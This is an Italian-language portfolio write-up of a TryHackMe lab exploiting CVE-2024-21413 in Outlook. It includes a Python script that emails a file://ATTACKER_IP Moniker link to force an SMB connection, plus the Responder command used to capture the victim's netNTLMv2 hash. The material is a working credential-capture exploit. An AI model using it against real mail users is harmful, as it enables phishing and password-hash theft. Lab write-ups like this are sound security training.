
Proof-of-concept exploit per CVE-2024-21413 che utilizza Moniker Link in email HTML per attivare una connessione SMB e catturare hash netNTLMv2 tramite Responder. Dimostra competenze in test di penetrazione, scripting Python e analisi dei protocolli di rete.
Panoramica: Una PoC pratica che dimostra l'uso di un Moniker Link in un'email HTML per attivare una connessione SMB da Outlook, consentendo di catturare l'hash netNTLMv2 della vittima tramite Responder. Questa dimostra competenze pratiche in penetration testing, scripting e analisi dei protocolli di rete.
file://) che punta alla condivisione SMB dell'attaccante.# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr
sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124' # THM SMTP server
password = input('Enter attacker email password: ')
html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'
msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))
with smtplib.SMTP(mailserver, 25) as s:
s.ehlo()
s.login(sender, password)
s.sendmail(sender, [receiver], msg.as_string())
print('Email delivered')
Consiglio: Sostituisci ATTACKER_IP e mailserver prima di eseguire. Nel laboratorio TryHackMe, la password è attacker.
responder -I ens5
Sostituisci ens5 con il nome della tua interfaccia di rete.
/etc/resolv.confA volte Responder fallisce a causa di symlink danneggiati in /etc/resolv.conf. Risolvi con:
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf
Competenze evidenziate: Risoluzione dei problemi su Linux, configurazione DNS e adattamento degli strumenti ad ambienti cloud/VM.
Errore / Problema resolv.conf:`

Correzione DNS applicata:

Script email Python:

Consegna dell'exploit:

Posta in arrivo della vittima:

Hash della vittima catturato:

Adattato dal laboratorio MonikerLink di TryHackMe e dalla PoC originale di CMNatic (GitHub)